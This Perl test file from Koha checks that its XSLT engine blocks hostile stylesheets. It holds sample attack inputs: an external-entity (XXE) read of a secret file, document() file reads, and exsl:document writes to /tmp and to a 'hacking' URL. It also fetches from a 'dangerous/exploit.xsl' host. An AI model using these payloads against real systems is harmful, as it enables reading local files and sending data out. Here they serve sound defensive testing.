3 # Copyright 2019 Rijksmuseum
5 # This file is part of Koha.
7 # Koha is free software; you can redistribute it and/or modify it
8 # under the terms of the GNU General Public License as published by
9 # the Free Software Foundation; either version 3 of the License, or
10 # (at your option) any later version.
12 # Koha is distributed in the hope that it will be useful, but
13 # WITHOUT ANY WARRANTY; without even the implied warranty of
14 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
15 # GNU General Public License for more details.
17 # You should have received a copy of the GNU General Public License
18 # along with Koha; if not, see <http://www.gnu.org/licenses>.
21 use File::Temp qw/tempfile/;
22 use Test::More tests => 8;
28 t::lib::Mocks::mock_config( 'koha_xslt_security', { expand_entities_unsafe => 1 } );
29 my $engine=Koha::XSLT::Base->new;
31 my $secret_file = mytempfile('Big secret');
33 <!DOCTYPE test [<!ENTITY secret SYSTEM "$secret_file">]>
34 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
35 <xsl:output method="xml" encoding="UTF-8" version="1.0" indent="yes"/>
36 <xsl:variable name="secret">&secret;</xsl:variable>
37 <xsl:template match="/">
38 <secret><xsl:value-of select="\$secret"/></secret>
42 my $output= $engine->transform({ xml => "<ignored/>", code => $xslt });
43 like($output, qr/Big secret/, 'external entity got through');
45 t::lib::Mocks::mock_config( 'koha_xslt_security', { expand_entities_unsafe => 0 } );
46 $engine=Koha::XSLT::Base->new;
47 $output= $engine->transform({ xml => "<ignored/>", code => $xslt });
48 unlike($output, qr/Big secret/, 'external entity did not get through');
50 # Adding a document call to trigger callback for read_file
51 # Does not depend on expand_entities.
53 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
54 <xsl:output method="xml" encoding="UTF-8" version="1.0" indent="yes"/>
55 <xsl:template match="/">
56 <read_file><xsl:copy-of select="document('file://$secret_file')"/></read_file>
60 warnings_like { $output= $engine->transform({ xml => "<ignored/>", code => $xslt }); }
61 [ qr/read_file called in XML::LibXSLT/, qr/runtime error/ ],
62 'Triggered security callback for read_file';
66 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
67 <xsl:output method="xml" encoding="UTF-8" version="1.0" indent="yes"/>
68 <xsl:template match="/">
69 <exsl:document href="file:///tmp/breached.txt" omit-xml-declaration="yes" method="text"><xsl:text>Breached!</xsl:text></exsl:document>
73 warnings_like { $output= $engine->transform({ xml => "<ignored/>", code => $xslt }); }
74 [ qr/write_file called in XML::LibXSLT/, qr/runtime error/ ],
75 'Triggered security callback for write_file';
79 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
80 <xsl:output method="xml" encoding="UTF-8" version="1.0" indent="yes"/>
81 <xsl:template match="/">
82 <xsl:copy-of select="document('http://bad.koha-community.org/dangerous/exploit.xsl')" />
86 warnings_like { $output= $engine->transform({ xml => "<ignored/>", code => $xslt }); }
87 [ qr/read_net called in XML::LibXSLT/, qr/runtime error/ ],
88 'Triggered security callback for read_net';
92 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
93 <xsl:output method="xml" encoding="UTF-8" version="1.0" indent="yes"/>
94 <xsl:template match="/">
95 <exsl:document href="http://hacking.koha-community.org/breached.txt" omit-xml-declaration="yes" method="html">
96 <xsl:text>Breached!</xsl:text>
101 warnings_like { $output= $engine->transform({ xml => "<ignored/>", code => $xslt }); }
102 [ qr/write_net called in XML::LibXSLT/, qr/runtime error/ ],
103 'Triggered security callback for write_net';
105 # Check remote import (include should be similar)
106 # Trusting koha-community.org DNS here ;)
107 # This should not trigger read_net but fail on the missing import.
109 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
110 <xsl:import href="http://notexpected.koha-community.org/noxsl/nothing.xsl"/>
111 <xsl:output method="xml" encoding="UTF-8" version="1.0" indent="yes"/>
112 <xsl:template match="/"/>
115 $engine->print_warns(1);
118 local $SIG{__WARN__} = sub { push @warn, $_[0]; };
119 $output= $engine->transform({ xml => "<ignored/>", code => $xslt });
120 is( ( grep { /failed to load (external entity|HTTP resource)/ } @warn ), 1, 'Expected import error' ); # we saw both messages on Jenkins passing by
121 is( ( grep { /read_net/ } @warn ), 0, 'No read_net warn for remote import' );
125 my ($fh, $fn) = tempfile( UNLINK => 1 );
126 print $fh $_[0] if $_[0];